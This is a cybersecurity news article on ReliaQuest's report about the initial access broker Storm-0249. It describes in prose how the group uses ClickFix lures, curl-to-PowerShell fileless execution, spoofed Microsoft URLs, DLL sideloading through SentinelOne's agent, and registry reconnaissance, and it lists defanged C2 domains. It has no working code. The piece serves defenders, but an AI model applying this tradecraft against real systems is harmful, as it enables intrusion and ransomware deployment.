SecurityBrief UK - Technology news for CISOs & cybersecurity decision-makers
United Kingdom

Guides

#
cloud security
#
cybersecurity
#
endpoint protection
#
firewalls
#
ransomware

Search

Dark server room ransomware attack shadowy hacker hands locks
#
Malware
#
Firewalls
#
Ransomware

Storm-0249 hijacks security tools to fuel ransomware

Wed, 7th Jan 2026
Author image
By Karen Joy Bacudo, Finance Editor

Cybersecurity firm ReliaQuest has identified a shift in tactics by the threat group known as Storm-0249, which it says is now targeting security software and trusted Windows tools in a bid to provide higher-value access for ransomware operators.

The team, described as a seasoned initial access broker (IAB) within the ransomware-as-a-service (RaaS) ecosystem, has moved away from broad phishing activity. It now focuses on stealthy post-exploitation techniques that aim to remain hidden inside enterprise environments for extended periods.

ReliaQuest reports that Storm-0249 has abused SentinelOne's SentinelAgentWorker.exe process as part of several recent attacks. The technique relies on Dynamic Link Library (DLL) sideloading, where a legitimate and digitally signed SentinelOne executable loads a malicious DLL placed alongside it. This makes hostile activity appear as routine endpoint detection and response (EDR) operations.

The group has also added Microsoft domain spoofing and curl-to-PowerShell command chaining to its playbook. These techniques use fake Microsoft-style URLs and trusted utilities such as curl.exe and PowerShell to deliver and execute malicious scripts in memory, which reduces the chance of detection by traditional antivirus tools.

ReliaQuest positions Storm-0249 as a key intermediary in modern ransomware operations. The group sells pre-built, persistent access to compromised networks to ransomware affiliates, which shortens the time between initial intrusion and file encryption and lowers the technical skills required to conduct an attack.

Abusing trusted tools

Recent Storm-0249 activity has started with a social engineering method known as "ClickFix". Victims are tricked into running a command via the Windows Run dialog under the guise of resolving a technical issue. The command appears benign but is likely obfuscated, which obscures its intent from both users and some security controls.

Once the attacker gains an initial foothold, the intrusion unfolds in several stages. The first stage uses curl.exe, a legitimate Windows command-line tool, to reach out to the attacker's infrastructure. Because administrators routinely use curl for tasks such as downloading updates or testing application interfaces, its activity often passes security controls without scrutiny.

Storm-0249 then leverages Microsoft domain spoofing. Malicious scripts are hosted on domains such as sgcipl[.]com, but the URL path includes segments like "/us.microsoft.com/" to resemble an official Microsoft address. This structure can mislead both end users and some filtering tools about the origin of the content.

The downloaded content is not written to disk. Instead, curl pipes the script directly into PowerShell for in-memory execution. This fileless technique avoids leaving artefacts that signature-based antivirus products typically rely on, which complicates forensic review.

Turning security tools

A central element of the observed campaigns is the use of DLL sideloading against SentinelOne agents. Storm-0249 disguises a trojanised DLL as a legitimate SentinelOne component and drops it into the user's AppData folder. The file sits beside the genuine SentinelAgentWorker.exe process, which later loads it under normal execution flow.

ReliaQuest says the malicious DLL arrives through a booby-trapped MSI installer obtained from a phishing URL that imitates a Microsoft support site. Windows Installer runs with SYSTEM-level privileges, which gives the attacker the ability to place files in protected directories and execute code with full system authority.

When SentinelAgentWorker.exe runs, it loads the attacker's DLL rather than the expected version. The process then acts as a carrier for the adversary's code while still appearing as a trusted, signed EDR executable. Many environments reduce monitoring intensity for such processes in order to limit alert volume.

The same hijacked SentinelOne process then handles command-and-control (C2) communication. Traffic is routed through digitally signed security software rather than unknown binaries. Domains used for C2, such as krivomadogolyhp[.]com and hristomasitomasdf[.]com, are registered close to the time of attack and accessed over Transport Layer Security (TLS), which restricts inspection.

ReliaQuest notes that monitoring DNS lookups for newly registered domains and profiling normal EDR traffic patterns can surface anomalies. It points to factors such as unexpected destination IP addresses, unusual connection frequency and data volumes as potential indicators of compromise.

Reconnaissance for ransom

Beyond establishing covert C2 channels, Storm-0249 uses the compromised SentinelAgentWorker.exe process to run reconnaissance commands. The group invokes standard Windows tools such as reg.exe and findstr.exe to query system identifiers, including MachineGuid, domain membership and installed software.

These utilities are widely used for administration and troubleshooting. Security teams often focus controls on more obviously risky binaries like PowerShell and cmd.exe, which leaves a grey area for less prominent but equally powerful tools.

ReliaQuest said this reconnaissance supports ransomware affiliates that later carry out the encryption phase. Ransomware families, including LockBit and ALPHV, reportedly use MachineGuid to bind encryption keys to specific victim systems. The use of trusted EDR processes as a wrapper for this activity makes the behaviour blend with normal endpoint monitoring traffic.

Broader IAB trend

Storm-0249's tactics reflect a broader shift in IAB operations towards stealth, persistence and identity-focused targeting. Techniques such as DLL sideloading, fileless execution and domain spoofing are not tied to a single vendor and can be replicated against other security or management platforms.

ReliaQuest warns that these methods reduce the effectiveness of standard remediation steps such as agent reinstalls or software patching. The underlying abuse of trusted relationships within the operating system and security stack can allow access to survive routine clean-up work.

The company has linked the behaviour to several MITRE ATT&CK techniques, including DLL sideloading, spear phishing attachments, obfuscated files and dynamic domain resolution. It has also released detection rules focused on ransomware signatures, unmitigated malware and suspicious registry interaction, along with automated response playbooks that isolate hosts, block domains and ban malicious file hashes.

In the context of rising RaaS activity and interest in pre-staged access, ReliaQuest expects techniques demonstrated by Storm-0249 to influence other IABs and spread across sectors.

Follow us on:
Follow us on LinkedIn Follow us on X
Share on:
Share on LinkedIn Share on X
Related stories
Deepfake boom fuels relentless wave of celebrity scams
Visionplatform.ai adds AI agents to Milestone XProtect
European privacy teams warn of cuts amid rising risks
Phishing services drive 389% surge in account breaches
isVerified launches AI voice deepfake defence for execs

Top stories

Executive-level CISO titles surge amid rising scope strain
UK unveils Software Security Ambassadors to push new code
Dun & Bradstreet outlines seven key compliance trends
Asimily boosts Cisco ISE with new device microsegmentation
Cyb3r Operations raises $5.4m to tackle cyber risk